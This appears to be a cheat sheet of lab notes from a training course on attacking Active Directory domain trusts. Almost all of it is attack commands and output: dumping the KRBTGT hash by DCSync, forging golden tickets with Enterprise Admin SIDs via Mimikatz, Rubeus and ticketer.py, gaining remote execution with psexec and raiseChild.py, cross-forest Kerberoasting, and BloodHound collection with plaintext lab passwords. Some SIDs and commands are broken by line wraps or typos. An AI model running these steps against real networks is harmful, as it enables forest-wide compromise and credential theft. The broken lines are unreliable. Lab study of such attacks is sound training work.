Enumeration
Copy Import-Module activedirectory
Get-ADTrust -Filter *
Copy Import-Module .\Powerview.ps1
Get-DomainTrust
Get-DomainTrustMapping Checking Users in the Child Domain using Get-DomainUser
Copy Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName Using netdom to query domain trust
Copy netdom query /domain:inlanefreight.local trust Using netdom to query domain controllers
Copy netdom query /domain:inlanefreight.local dc Using netdom to query workstations and servers
Copy netdom query /domain:inlanefreight.local workstation Attacking Domain Trust Child - Parent Trust from Windows
SID History Primer
This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a Golden Ticket or a Kerberos ticket- granting ticket (TGT), which will allow for us to authenticate as any account in the domain of our choosing for further persistence.
https://www.thehacker.recipes/ad/persistence/sid-history
This attack allows for the compromise of a parent domain once the child domain has been compromised.
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz
Obtaining the KRBTGT Account's NT Hash using Mimikatz
Copy PS C:\htb> mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt Get-DomainSID
We can use the PowerView Get-DomainSID function to get the SID for the child domain, but this is also visible in the Mimikatz output above
Copy PS C:\htb> Import Powerview.ps1
PS C:\htb> Get-DomainSID
S-1-5-21-2806153819-209893948-922872689 **Obtaining Enterprise Admins Group's SID using Get-DomainGroup
Copy # using activedirectory module
Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"
# using powerview
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f
The SID for the child domain: S-1-5-21-2806153819-209893948-922872689
The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: hacker
The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL
The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050-3880317879-2865463114-519
Creating Golden Ticket with Mimikatz
Copy PS C:\htb> mimikatz.exe
mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948- 922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21- 3842939050-3880317879-2865463114-519 /ptt Confirming a Kerberos Ticket is in Memory Using klist
Copy PS C:\htb> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948- 922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
Copy PS C:\Tools> .\mimikatz.exe
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCA Attacking Domain Trust Child - Parent Trust from Linux
We'll still need to gather the same bits of information
This attack allows for the compromise of a parent domain once the child domain has been compromised.
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
Copy secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc- user LOGISTICS/krbtgt
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d 5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1- 96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up..
Copy lookupsid.py logistics.inlanefreight.local/[email protected]
Password: [*] Brute forcing SIDs at 172.16.5.240
[*] StringBinding ncacn_np:172.16.5.240[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689 Looking for the Domain SID
Copy lookupsid.py logistics.inlanefreight.local/[email protected] | grep "Domain SID"
Password: [*]
Domain SID is: S-1-5-21-2806153819-209893948-92287268 Grabbing the Domain SID & Attaching to Enterprise Admin's RID
Copy lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"
Password:
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114
498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: INLANEFREIGHT\administrator (SidTypeUser)
501: INLANEFREIGHT\guest (SidTypeUser)
502: INLANEFREIGHT\krbtgt (SidTypeUser)
512: INLANEFREIGHT\Domain Admins (SidTypeGroup)
513: INLANEFREIGHT\Domain Users (SidTypeGroup)
514: INLANEFREIGHT\Domain Guests (SidTypeGroup)
515: INLANEFREIGHT\Domain Computers (SidTypeGroup)
516: INLANEFREIGHT\Domain Controllers (SidTypeGroup)
517: INLANEFREIGHT\Cert Publishers (SidTypeAlias)
518: INLANEFREIGHT\Schema Admins (SidTypeGroup)
519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup) The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f
The SID for the child domain: S-1-5-21-2806153819-209893948-922872689
The name of a target user in the child domain (does not need to exist!): hacker
The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL
The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050- 3880317879-2865463114-519
Constructing a Golden Ticket using ticketer.py
Copy ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948- 922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
...
[*] Saving ticket in hacker.ccache]
Copy export KRB5CCNAME=hacker.ccache
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass - target-ip 172.16.5.5
Copy raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
Cross-Forest Kerberoasting
Enumerating Accounts for Associated SPNs Using Get-DomainUser
Copy Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
samaccountname
--------------
krbtgt
mssqlsvc Enumerating the mssqlsvc Account
Copy PS C:\htb> Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof
samaccountname memberof
-------------- --------
mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL
Performing a Kerberoasting Attacking with Rubeus Using /domain Flag
Copy PS C:\htb> .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
[*] Total kerberoastable users : 1
[*] SamAccountName : mssqlsvc
[*] DistinguishedName : CN=mssqlsvc,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL
[*] ServicePrincipalName : MSSQLsvc/sql01.freightlogstics:1433
[*] PwdLastSet : 3/24/2022 12:47:52 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$MSSQLsvc/sql01.freightlogstic s: *$<SNIP> Admin Password Re-Use & Group Membership
From time to time, we'll run into a situation where there is a bidirectional forest trust managed by admins from the same company.
Copy Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
GroupDomain : FREIGHTLOGISTICS.LOCAL
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL
MemberDomain : FREIGHTLOGISTICS.LOCAL
MemberName : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114- 500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGIS TICS,DC=LOCAL
PS C:\htb> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500 INLANEFREIGHT\administrator
Copy PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA- DC03.FREIGHTLOGISTICS.LOCAL -Credential -Credential INLANEFREIGHT\administrator
PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator
PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all
Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
Primary Dns Suffix . . . . . . . : FREIGHTLOGISTICS.LOCAL
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCA Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
Cross-Forest Kerberoasting
Copy GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Copy GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley Hunting Foreign Group Membership with Bloodhound-python
Copy cat /etc/resolv.conf
# run "resolvectl status" to see details about the actual nameservers.
#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain INLANEFREIGHT.LOCAL
nameserver 172.16.5.5
Copy bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2
Copy cat /etc/resolv.conf
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
# 127.0.0.53 is the systemd-resolved stub resolver.
# run "resolvectl status" to see details about the actual nameservers.
#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain FREIGHTLOGISTICS.LOCAL
nameserver 172.16.5.238
Copy bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA- DC03.FREIGHTLOGISTICS.LOCAL -c All -u [email protected] -p Klmcargo Upload both data (first and second domain) to bloodhound and select:
Users with Foreign Domain Group Membership